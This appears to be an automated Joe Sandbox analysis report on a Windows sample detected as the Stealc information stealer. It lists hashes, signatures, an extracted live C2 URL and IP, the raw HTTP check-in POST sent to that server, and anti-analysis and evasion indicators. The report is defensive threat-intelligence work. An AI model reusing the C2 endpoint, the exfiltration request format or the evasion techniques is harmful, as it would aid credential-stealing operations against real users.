Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544422
MD5:345e2a6577340e9722715c9a42736169
SHA1:48ebfe09a9482f6289a7db2523594bab4d600a08
SHA256:1b8052833a2230173369c09749f616b2bf4812983ed541d803f24afdfb01caa0
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 345E2A6577340E9722715C9A42736169)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6396JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6396JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.700000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T12:04:12.693723+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: 0.2.file.exe.700000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00719030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0070A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0070A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007072A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007072A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0070C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007140F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0070E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00701710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00701710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007147C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007147C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0070F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00714B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00713B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00713B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0070DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0070BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0070EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0070DF10

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 30 34 32 38 36 45 35 31 36 39 33 31 39 36 39 33 34 38 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="hwid"9404286E51693196934881------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="build"tale------HCAFIJDGHCBFHJKFCGIE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007062D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_007062D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 30 34 32 38 36 45 35 31 36 39 33 31 39 36 39 33 34 38 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="hwid"9404286E51693196934881------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="build"tale------HCAFIJDGHCBFHJKFCGIE--
                Source: file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
                Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phphc_
                Source: file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B0870_2_00B5B087
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007400980_2_00740098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007321380_2_00732138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075B1980_2_0075B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076E2580_2_0076E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007442880_2_00744288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A123A90_2_00A123A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078B3080_2_0078B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B543360_2_00B54336
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B603040_2_00B60304
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077D39E0_2_0077D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007245730_2_00724573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072E5440_2_0072E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B595330_2_00B59533
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF55150_2_00AF5515
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007445A80_2_007445A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076D5A80_2_0076D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077A6480_2_0077A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007896FD0_2_007896FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007466C80_2_007466C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075D7200_2_0075D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5E7390_2_00B5E739
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B637070_2_00B63707
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007767990_2_00776799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007548680_2_00754868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076F8D60_2_0076F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007598B80_2_007598B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075B8A80_2_0075B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABD9610_2_00ABD961
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B57AA80_2_00B57AA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5CBCF0_2_00B5CBCF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00768BD90_2_00768BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FFB5E0_2_009FFB5E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00774BA80_2_00774BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00770B880_2_00770B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077AC280_2_0077AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC3C220_2_00AC3C22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B66C190_2_00B66C19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC4C1C0_2_00AC4C1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00731D780_2_00731D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075BD680_2_0075BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076AD380_2_0076AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B61D2B0_2_00B61D2B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00754DC80_2_00754DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00755DB90_2_00755DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00748E780_2_00748E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00771EE80_2_00771EE8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00704610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: oqzwigwm ZLIB complexity 0.9946159456084104
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00719790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00713970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00713970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\7VPW6J5H.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2155008 > 1048576
                Source: file.exeStatic PE information: Raw size of oqzwigwm is bigger than: 0x100000 < 0x1a3200
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.700000.0.unpack :EW;.rsrc :W;.idata :W; :EW;oqzwigwm:EW;bpeuitit:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;oqzwigwm:EW;bpeuitit:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00719BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x218841 should be: 0x2104bd
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: oqzwigwm
                Source: file.exeStatic PE information: section name: bpeuitit
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 02A74567h; mov dword ptr [esp], edx0_2_00B5B111
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push edi; mov dword ptr [esp], 7DF5B252h0_2_00B5B118
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push esi; mov dword ptr [esp], edx0_2_00B5B121
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 0439610Bh; mov dword ptr [esp], ebx0_2_00B5B25E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push edi; mov dword ptr [esp], ecx0_2_00B5B315
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 791D60FAh; mov dword ptr [esp], edi0_2_00B5B335
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 56B8C812h; mov dword ptr [esp], eax0_2_00B5B3BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ecx; mov dword ptr [esp], 7FE22791h0_2_00B5B3D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 7D8DCB00h; mov dword ptr [esp], ebp0_2_00B5B408
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ecx; mov dword ptr [esp], edi0_2_00B5B490
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push eax; mov dword ptr [esp], edi0_2_00B5B559
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ecx; mov dword ptr [esp], 23DD5600h0_2_00B5B601
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ebx; mov dword ptr [esp], 76EEAF05h0_2_00B5B676
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 7A850C21h; mov dword ptr [esp], eax0_2_00B5B690
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ebp; mov dword ptr [esp], 5FDCD42Ch0_2_00B5B6A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ecx; mov dword ptr [esp], edi0_2_00B5B730
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 430AE650h; mov dword ptr [esp], eax0_2_00B5B743
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 501F85B5h; mov dword ptr [esp], ebp0_2_00B5B776
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push esi; mov dword ptr [esp], ecx0_2_00B5B7A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 0955A58Ah; mov dword ptr [esp], eax0_2_00B5B7E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ebx; mov dword ptr [esp], edx0_2_00B5B8AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push edx; mov dword ptr [esp], esi0_2_00B5B98C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push eax; mov dword ptr [esp], ebp0_2_00B5B9A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 121741A0h; mov dword ptr [esp], ebx0_2_00B5B9F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ebx; mov dword ptr [esp], ecx0_2_00B5BA69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push ebp; mov dword ptr [esp], 37F9876Ah0_2_00B5BAEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push edx; mov dword ptr [esp], 16FA4CE7h0_2_00B5BB95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 5790FB99h; mov dword ptr [esp], ebp0_2_00B5BBA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 2ACD73C1h; mov dword ptr [esp], eax0_2_00B5BBB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push esi; mov dword ptr [esp], 6AB7E652h0_2_00B5BC64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B087 push 27B2F78Fh; mov dword ptr [esp], ebp0_2_00B5BCD9
                Source: file.exeStatic PE information: section name: oqzwigwm entropy: 7.953066845220626

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00719BB0

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37959
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
